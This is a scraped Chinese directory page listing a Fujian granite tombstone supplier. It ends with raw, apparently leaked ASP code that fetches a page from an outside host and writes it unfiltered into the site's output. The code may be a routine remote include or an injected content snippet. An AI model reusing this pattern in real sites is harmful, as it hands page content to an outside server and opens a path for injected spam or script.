首页 > 所有类目> 墓碑>>(共有 墓碑 企业 1 条)
按行业筛选
公司+经营模式+主营产品
会员等级
即时交流
 
 福建省长泰县新明毅石材厂位于中国石材G654生产基地长泰林墩工业区,距厦门港60km,G654#矿区
主营:墓石料,654墓石料,G654墓石料,芝
[福建省-漳州市]
  • 卖石通会员
  • 第 1 年
技术支持:厦门帮企信息技术有限公司
<% Function getHTTPPage(url) dim objXML set objXML=server.createobject("MSXML2.XMLHTTP") objXML.open "GET",url,false On Error Resume Next objXML.send() If objXML.readystate<>4 then exit function else if instr(url,"utf-") > 0 then getHTTPPage=objXML.ResponseText else getHTTPPage=BytesToBstr(objXML.responseBody) end if set objXML=nothing End If if err.number<>0 then err.Clear End Function Function BytesToBstr(body) dim objstream set objstream = Server.CreateObject("adodb.stream") objstream.Type = 1 objstream.Mode =3 objstream.Open objstream.Write body objstream.Position = 0 objstream.Type = 2 objstream.Charset = "GB2312" BytesToBstr = objstream.ReadText objstream.Close set objstream = nothing End Function Dim Url,Html Url = "http://www.100lian.net/user/26093.html" response.write(getHTTPPage(Url)) %>